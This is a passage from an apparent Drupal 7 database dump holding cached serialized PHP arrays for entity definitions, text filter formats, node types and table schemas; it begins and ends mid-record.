types\";}}s:11:\"rdf_mapping\";a:9:{s:7:\"rdftype\";a:1:{i:0;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}}s:4:\"blog\";a:3:{s:5:\"label\";s:10:\"Blog entry\";s:5:\"admin\";a:4:{s:4:\"path\";s:39:\"admin/structure/types/manage/%node_type\";s:9:\"real path\";s:33:\"admin/structure/types/manage/blog\";s:15:\"bundle argument\";i:4;s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:9:{s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Post\";i:1;s:14:\"sioct:BlogPost\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}}}s:10:\"view modes\";a:5:{s:4:\"full\";a:2:{s:5:\"label\";s:12:\"Full content\";s:15:\"custom settings\";b:0;}s:6:\"teaser\";a:2:{s:5:\"label\";s:6:\"Teaser\";s:15:\"custom settings\";b:1;}s:3:\"rss\";a:2:{s:5:\"label\";s:3:\"RSS\";s:15:\"custom settings\";b:0;}s:12:\"search_index\";a:2:{s:5:\"label\";s:12:\"Search index\";s:15:\"custom settings\";b:0;}s:13:\"search_result\";a:2:{s:5:\"label\";s:32:\"Search result highlighting input\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:9:\"node_load\";s:11:\"translation\";a:0:{}s:22:\"base table field types\";a:14:{s:3:\"nid\";s:6:\"serial\";s:3:\"vid\";s:3:\"int\";s:4:\"type\";s:7:\"varchar\";s:8:\"language\";s:7:\"varchar\";s:5:\"title\";s:7:\"varchar\";s:3:\"uid\";s:3:\"int\";s:6:\"status\";s:3:\"int\";s:7:\"created\";s:3:\"int\";s:7:\"changed\";s:3:\"int\";s:7:\"comment\";s:3:\"int\";s:7:\"promote\";s:3:\"int\";s:6:\"sticky\";s:3:\"int\";s:4:\"tnid\";s:3:\"int\";s:9:\"translate\";s:3:\"int\";}s:17:\"schema_fields_sql\";a:2:{s:10:\"base table\";a:14:{i:0;s:3:\"nid\";i:1;s:3:\"vid\";i:2;s:4:\"type\";i:3;s:8:\"language\";i:4;s:5:\"title\";i:5;s:3:\"uid\";i:6;s:6:\"status\";i:7;s:7:\"created\";i:8;s:7:\"changed\";i:9;s:7:\"comment\";i:10;s:7:\"promote\";i:11;s:6:\"sticky\";i:12;s:4:\"tnid\";i:13;s:9:\"translate\";}s:14:\"revision table\";a:10:{i:0;s:3:\"nid\";i:1;s:3:\"vid\";i:2;s:3:\"uid\";i:3;s:5:\"title\";i:4;s:3:\"log\";i:5;s:9:\"timestamp\";i:6;s:6:\"status\";i:7;s:7:\"comment\";i:8;s:7:\"promote\";i:9;s:6:\"sticky\";}}}s:4:\"file\";a:13:{s:5:\"label\";s:4:\"File\";s:10:\"base table\";s:12:\"file_managed\";s:11:\"entity keys\";a:4:{s:2:\"id\";s:3:\"fid\";s:5:\"label\";s:8:\"filename\";s:8:\"revision\";s:0:\"\";s:6:\"bundle\";s:0:\"\";}s:12:\"static cache\";b:0;s:9:\"fieldable\";b:0;s:16:\"controller class\";s:29:\"DrupalDefaultEntityController\";s:11:\"field cache\";b:1;s:9:\"load hook\";s:9:\"file_load\";s:7:\"bundles\";a:1:{s:4:\"file\";a:2:{s:5:\"label\";s:4:\"File\";s:11:\"rdf_mapping\";a:0:{}}}s:10:\"view modes\";a:0:{}s:11:\"translation\";a:0:{}s:22:\"base table field types\";a:8:{s:3:\"fid\";s:6:\"serial\";s:3:\"uid\";s:3:\"int\";s:8:\"filename\";s:7:\"varchar\";s:3:\"uri\";s:7:\"varchar\";s:8:\"filemime\";s:7:\"varchar\";s:8:\"filesize\";s:3:\"int\";s:6:\"status\";s:3:\"int\";s:9:\"timestamp\";s:3:\"int\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:8:{i:0;s:3:\"fid\";i:1;s:3:\"uid\";i:2;s:8:\"filename\";i:3;s:3:\"uri\";i:4;s:8:\"filemime\";i:5;s:8:\"filesize\";i:6;s:6:\"status\";i:7;s:9:\"timestamp\";}}}s:13:\"taxonomy_term\";a:15:{s:5:\"label\";s:13:\"Taxonomy term\";s:16:\"controller class\";s:22:\"TaxonomyTermController\";s:10:\"base table\";s:18:\"taxonomy_term_data\";s:12:\"uri callback\";s:17:\"taxonomy_term_uri\";s:9:\"fieldable\";b:1;s:11:\"entity keys\";a:4:{s:2:\"id\";s:3:\"tid\";s:6:\"bundle\";s:23:\"vocabulary_machine_name\";s:5:\"label\";s:4:\"name\";s:8:\"revision\";s:0:\"\";}s:11:\"bundle keys\";a:1:{s:6:\"bundle\";s:12:\"machine_name\";}s:7:\"bundles\";a:1:{s:4:\"tags\";a:3:{s:5:\"label\";s:4:\"Tags\";s:5:\"admin\";a:4:{s:4:\"path\";s:58:\"admin/structure/taxonomy/%taxonomy_vocabulary_machine_name\";s:9:\"real path\";s:29:\"admin/structure/taxonomy/tags\";s:15:\"bundle argument\";i:3;s:16:\"access arguments\";a:1:{i:0;s:19:\"administer taxonomy\";}}s:11:\"rdf_mapping\";a:5:{s:7:\"rdftype\";a:1:{i:0;s:12:\"skos:Concept\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:2:{i:0;s:10:\"rdfs:label\";i:1;s:14:\"skos:prefLabel\";}}s:11:\"description\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"skos:definition\";}}s:3:\"vid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:13:\"skos:inScheme\";}s:4:\"type\";s:3:\"rel\";}s:6:\"parent\";a:2:{s:10:\"predicates\";a:1:{i:0;s:12:\"skos:broader\";}s:4:\"type\";s:3:\"rel\";}}}}s:10:\"view modes\";a:1:{s:4:\"full\";a:2:{s:5:\"label\";s:18:\"Taxonomy term page\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:18:\"taxonomy_term_load\";s:11:\"translation\";a:0:{}s:22:\"base table field types\";a:6:{s:3:\"tid\";s:6:\"serial\";s:3:\"vid\";s:3:\"int\";s:4:\"name\";s:7:\"varchar\";s:11:\"description\";s:4:\"text\";s:6:\"format\";s:7:\"varchar\";s:6:\"weight\";s:3:\"int\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:6:{i:0;s:3:\"tid\";i:1;s:3:\"vid\";i:2;s:4:\"name\";i:3;s:11:\"description\";i:4;s:6:\"format\";i:5;s:6:\"weight\";}}}s:19:\"taxonomy_vocabulary\";a:13:{s:5:\"label\";s:19:\"Taxonomy vocabulary\";s:16:\"controller class\";s:28:\"TaxonomyVocabularyController\";s:10:\"base table\";s:19:\"taxonomy_vocabulary\";s:11:\"entity keys\";a:4:{s:2:\"id\";s:3:\"vid\";s:5:\"label\";s:4:\"name\";s:8:\"revision\";s:0:\"\";s:6:\"bundle\";s:0:\"\";}s:9:\"fieldable\";b:0;s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:24:\"taxonomy_vocabulary_load\";s:7:\"bundles\";a:1:{s:19:\"taxonomy_vocabulary\";a:2:{s:5:\"label\";s:19:\"Taxonomy vocabulary\";s:11:\"rdf_mapping\";a:3:{s:7:\"rdftype\";a:1:{i:0;s:18:\"skos:ConceptScheme\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:11:\"description\";a:1:{s:10:\"predicates\";a:1:{i:0;s:12:\"rdfs:comment\";}}}}}s:10:\"view modes\";a:0:{}s:11:\"translation\";a:0:{}s:22:\"base table field types\";a:7:{s:3:\"vid\";s:6:\"serial\";s:4:\"name\";s:7:\"varchar\";s:12:\"machine_name\";s:7:\"varchar\";s:11:\"description\";s:4:\"text\";s:9:\"hierarchy\";s:3:\"int\";s:6:\"module\";s:7:\"varchar\";s:6:\"weight\";s:3:\"int\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:7:{i:0;s:3:\"vid\";i:1;s:4:\"name\";i:2;s:12:\"machine_name\";i:3;s:11:\"description\";i:4;s:9:\"hierarchy\";i:5;s:6:\"module\";i:6;s:6:\"weight\";}}}s:4:\"user\";a:15:{s:5:\"label\";s:4:\"User\";s:16:\"controller class\";s:14:\"UserController\";s:10:\"base table\";s:5:\"users\";s:12:\"uri callback\";s:8:\"user_uri\";s:14:\"label callback\";s:15:\"format_username\";s:9:\"fieldable\";b:1;s:11:\"entity keys\";a:3:{s:2:\"id\";s:3:\"uid\";s:8:\"revision\";s:0:\"\";s:6:\"bundle\";s:0:\"\";}s:7:\"bundles\";a:1:{s:4:\"user\";a:3:{s:5:\"label\";s:4:\"User\";s:5:\"admin\";a:2:{s:4:\"path\";s:28:\"admin/config/people/accounts\";s:16:\"access arguments\";a:1:{i:0;s:16:\"administer users\";}}s:11:\"rdf_mapping\";a:3:{s:7:\"rdftype\";a:1:{i:0;s:16:\"sioc:UserAccount\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:8:\"homepage\";a:2:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:page\";}s:4:\"type\";s:3:\"rel\";}}}}s:10:\"view modes\";a:1:{s:4:\"full\";a:2:{s:5:\"label\";s:12:\"User account\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:9:\"user_load\";s:11:\"translation\";a:0:{}s:22:\"base table field types\";a:16:{s:3:\"uid\";s:3:\"int\";s:4:\"name\";s:7:\"varchar\";s:4:\"pass\";s:7:\"varchar\";s:4:\"mail\";s:7:\"varchar\";s:5:\"theme\";s:7:\"varchar\";s:9:\"signature\";s:7:\"varchar\";s:16:\"signature_format\";s:7:\"varchar\";s:7:\"created\";s:3:\"int\";s:6:\"access\";s:3:\"int\";s:5:\"login\";s:3:\"int\";s:6:\"status\";s:3:\"int\";s:8:\"timezone\";s:7:\"varchar\";s:8:\"language\";s:7:\"varchar\";s:7:\"picture\";s:3:\"int\";s:4:\"init\";s:7:\"varchar\";s:4:\"data\";s:4:\"blob\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:16:{i:0;s:3:\"uid\";i:1;s:4:\"name\";i:2;s:4:\"pass\";i:3;s:4:\"mail\";i:4;s:5:\"theme\";i:5;s:9:\"signature\";i:6;s:16:\"signature_format\";i:7;s:7:\"created\";i:8;s:6:\"access\";i:9;s:5:\"login\";i:10;s:6:\"status\";i:11;s:8:\"timezone\";i:12;s:8:\"language\";i:13;s:7:\"picture\";i:14;s:4:\"init\";i:15;s:4:\"data\";}}}}',0,1444940177,1),('filter_formats:en','a:4:{s:13:\"filtered_html\";O:8:\"stdClass\":5:{s:6:\"format\";s:13:\"filtered_html\";s:4:\"name\";s:13:\"Filtered HTML\";s:5:\"cache\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:6:\"weight\";s:1:\"0\";}s:9:\"full_html\";O:8:\"stdClass\":5:{s:6:\"format\";s:9:\"full_html\";s:4:\"name\";s:9:\"Full HTML\";s:5:\"cache\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:6:\"weight\";s:1:\"1\";}s:10:\"plain_text\";O:8:\"stdClass\":5:{s:6:\"format\";s:10:\"plain_text\";s:4:\"name\";s:10:\"Plain text\";s:5:\"cache\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:6:\"weight\";s:2:\"10\";}s:8:\"php_code\";O:8:\"stdClass\":5:{s:6:\"format\";s:8:\"php_code\";s:4:\"name\";s:8:\"PHP code\";s:5:\"cache\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:6:\"weight\";s:2:\"11\";}}',0,1444940208,1),('filter_list_format','a:4:{s:8:\"php_code\";a:6:{s:11:\"filter_html\";O:8:\"stdClass\":6:{s:6:\"format\";s:8:\"php_code\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:11:\"filter_html\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:168:\"a:3:{s:12:\"allowed_html\";s:74:\"
    1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}\";}s:18:\"filter_html_escape\";O:8:\"stdClass\":6:{s:6:\"format\";s:8:\"php_code\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:18:\"filter_html_escape\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}s:12:\"filter_autop\";O:8:\"stdClass\":6:{s:6:\"format\";s:8:\"php_code\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"filter_autop\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}s:10:\"filter_url\";O:8:\"stdClass\":6:{s:6:\"format\";s:8:\"php_code\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:10:\"filter_url\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:40:\"a:1:{s:17:\"filter_url_length\";s:2:\"72\";}\";}s:8:\"php_code\";O:8:\"stdClass\":6:{s:6:\"format\";s:8:\"php_code\";s:6:\"module\";s:3:\"php\";s:4:\"name\";s:8:\"php_code\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:20:\"filter_htmlcorrector\";O:8:\"stdClass\":6:{s:6:\"format\";s:8:\"php_code\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:20:\"filter_htmlcorrector\";s:6:\"weight\";s:2:\"10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}}s:9:\"full_html\";a:5:{s:11:\"filter_html\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:11:\"filter_html\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:168:\"a:3:{s:12:\"allowed_html\";s:74:\"
        1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}\";}s:18:\"filter_html_escape\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:18:\"filter_html_escape\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}s:10:\"filter_url\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:10:\"filter_url\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:36:\"a:1:{s:17:\"filter_url_length\";i:72;}\";}s:12:\"filter_autop\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"filter_autop\";s:6:\"weight\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:20:\"filter_htmlcorrector\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:20:\"filter_htmlcorrector\";s:6:\"weight\";s:2:\"10\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}}s:10:\"plain_text\";a:5:{s:11:\"filter_html\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:11:\"filter_html\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:168:\"a:3:{s:12:\"allowed_html\";s:74:\"
            1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}\";}s:18:\"filter_html_escape\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:18:\"filter_html_escape\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:10:\"filter_url\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:10:\"filter_url\";s:6:\"weight\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:36:\"a:1:{s:17:\"filter_url_length\";i:72;}\";}s:12:\"filter_autop\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"filter_autop\";s:6:\"weight\";s:1:\"2\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:20:\"filter_htmlcorrector\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:20:\"filter_htmlcorrector\";s:6:\"weight\";s:2:\"10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}}s:13:\"filtered_html\";a:5:{s:18:\"filter_html_escape\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:18:\"filter_html_escape\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}s:10:\"filter_url\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:10:\"filter_url\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:36:\"a:1:{s:17:\"filter_url_length\";i:72;}\";}s:11:\"filter_html\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:11:\"filter_html\";s:6:\"weight\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:168:\"a:3:{s:12:\"allowed_html\";s:74:\"
                1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}\";}s:12:\"filter_autop\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"filter_autop\";s:6:\"weight\";s:1:\"2\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:20:\"filter_htmlcorrector\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:20:\"filter_htmlcorrector\";s:6:\"weight\";s:2:\"10\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}}}',0,1444940208,1),('node_types:en','O:8:\"stdClass\":2:{s:5:\"types\";a:3:{s:4:\"blog\";O:8:\"stdClass\":15:{s:4:\"name\";s:10:\"Blog entry\";s:4:\"base\";s:4:\"blog\";s:11:\"description\";s:58:\"Use for multi-user blogs. Every user gets a personal blog.\";s:4:\"type\";s:4:\"blog\";s:4:\"help\";s:0:\"\";s:6:\"custom\";i:0;s:8:\"modified\";i:0;s:6:\"locked\";i:1;s:8:\"disabled\";b:0;s:6:\"is_new\";i:1;s:9:\"has_title\";i:1;s:11:\"title_label\";s:5:\"Title\";s:6:\"module\";s:4:\"blog\";s:9:\"orig_type\";s:4:\"blog\";s:16:\"disabled_changed\";b:0;}s:7:\"article\";O:8:\"stdClass\":14:{s:4:\"type\";s:7:\"article\";s:4:\"name\";s:7:\"Article\";s:4:\"base\";s:12:\"node_content\";s:6:\"module\";s:4:\"node\";s:11:\"description\";s:89:\"Use articles for time-sensitive content like news, press releases or blog posts.\";s:4:\"help\";s:0:\"\";s:9:\"has_title\";s:1:\"1\";s:11:\"title_label\";s:5:\"Title\";s:6:\"custom\";s:1:\"1\";s:8:\"modified\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:8:\"disabled\";s:1:\"0\";s:9:\"orig_type\";s:7:\"article\";s:16:\"disabled_changed\";b:0;}s:4:\"page\";O:8:\"stdClass\":14:{s:4:\"type\";s:4:\"page\";s:4:\"name\";s:10:\"Basic page\";s:4:\"base\";s:12:\"node_content\";s:6:\"module\";s:4:\"node\";s:11:\"description\";s:77:\"Use basic pages for your static content, such as an \'About us\' page.\";s:4:\"help\";s:0:\"\";s:9:\"has_title\";s:1:\"1\";s:11:\"title_label\";s:5:\"Title\";s:6:\"custom\";s:1:\"1\";s:8:\"modified\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:8:\"disabled\";s:1:\"0\";s:9:\"orig_type\";s:4:\"page\";s:16:\"disabled_changed\";b:0;}}s:5:\"names\";a:3:{s:7:\"article\";s:7:\"Article\";s:4:\"page\";s:10:\"Basic page\";s:4:\"blog\";s:10:\"Blog entry\";}}',0,1444940177,1),('schema','a:78:{s:5:\"block\";a:6:{s:6:\"fields\";a:12:{s:3:\"bid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:1:\"0\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"region\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"custom\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:10:\"visibility\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:5:\"pages\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:5:\"title\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:5:\"cache\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"bid\";}s:11:\"unique keys\";a:1:{s:3:\"tmd\";a:3:{i:0;s:5:\"theme\";i:1;s:6:\"module\";i:2;s:5:\"delta\";}}s:7:\"indexes\";a:1:{s:4:\"list\";a:5:{i:0;s:5:\"theme\";i:1;s:6:\"status\";i:2;s:6:\"region\";i:3;s:6:\"weight\";i:4;s:6:\"module\";}}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:5:\"block\";}s:10:\"block_role\";a:5:{s:6:\"fields\";a:3:{s:6:\"module\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"delta\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:3:\"rid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:3:{i:0;s:6:\"module\";i:1;s:5:\"delta\";i:2;s:3:\"rid\";}s:7:\"indexes\";a:1:{s:3:\"rid\";a:1:{i:0;s:3:\"rid\";}}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:10:\"block_role\";}s:12:\"block_custom\";a:5:{s:6:\"fields\";a:4:{s:3:\"bid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"body\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:4:\"info\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"unique keys\";a:1:{s:4:\"info\";a:1:{i:0;s:4:\"info\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"bid\";}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:12:\"block_custom\";}s:11:\"cache_block\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:11:\"cache_block\";}s:14:\"adsense_clicks\";a:5:{s:6:\"fields\";a:6:{s:3:\"aid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:2:\"ip\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";s:2:\"15\";s:8:\"not null\";b:0;s:7:\"default\";s:1:\"0\";}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";s:3:\"255\";s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";s:3:\"255\";s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:8:\"referrer\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";s:3:\"255\";s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}}s:11:\"primary 